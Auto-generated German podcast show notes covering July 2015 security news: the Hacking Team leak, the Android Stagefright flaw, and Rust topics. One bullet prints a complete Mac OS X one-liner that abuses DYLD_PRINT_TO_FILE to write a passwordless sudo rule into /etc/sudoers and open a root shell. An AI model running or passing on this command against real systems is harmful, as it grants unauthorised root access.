-------------------------------------------------------------------------------- Diese Shownotes wurden automatisiert aus extrahiert, siehe . -------------------------------------------------------------------------------- ## Juli 2015 News: - - - - Hacking Team hacked: - mailaender "security firma" - 400GB daten auf Wikileaks gelandet: - Geschäftsberichte, Exceltabellen + 1mio emails - deren Passwörter ("passw0rd") - aber auch ZeroDays (Flash, Chrome, Windows!) - Kaufen ZeroDays hauptsaechlich ein - - - - - Stagefright - Joshua Drake von Zimperium zLabs gegenüber Forbes erklärt, - muss der Angreifer seinem Opfer in spe lediglich eine MMS- oder Hangouts-Nachricht schicken, in der sich Exploit-Code befindet. - Angriff ohne Spuren - Smartphone als Wanze - Android 2.2 bis 5.1 verwundbar - Hersteller sind gefragt - Full Disclosure auf der BlackHat - Zumindest das Google-Referenzgerät Nexus 6 und das Blackphone sollen bereits gegen einige der Schwachstellen gewappnet sein. - Die Entwickler der alternativen Android-Distribution CyanogenMod erklären, dass sie die Lücken bereits vor Wochen in CM 12 und der Nightly Build von 12.1 geschlossen haben - vor allem Android-Versionen, die älter als 4.1 sind. Neuere Versionen mit Schutzfunktionen ausgestattet, die das Ausnutzen über MMS erschweren - Mac OS X Priviledge Escalation in 300 Zeichen - echo 'echo "\$(whoami) ALL=(ALL) NOPASSWD:ALL" \>&3' \| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s - - OS X Yosemite Mac using code that fits in a tweet. (El Capitan) - Jeep Thema: Rust \* Fmt standards \* Pkg registry \* Coole Projekte? (WIP)